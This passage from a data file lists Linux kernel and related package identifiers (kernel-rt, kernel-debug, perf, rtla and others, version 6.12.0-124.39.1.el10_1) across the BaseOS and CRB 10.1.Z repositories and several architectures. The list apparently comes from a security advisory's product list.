"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
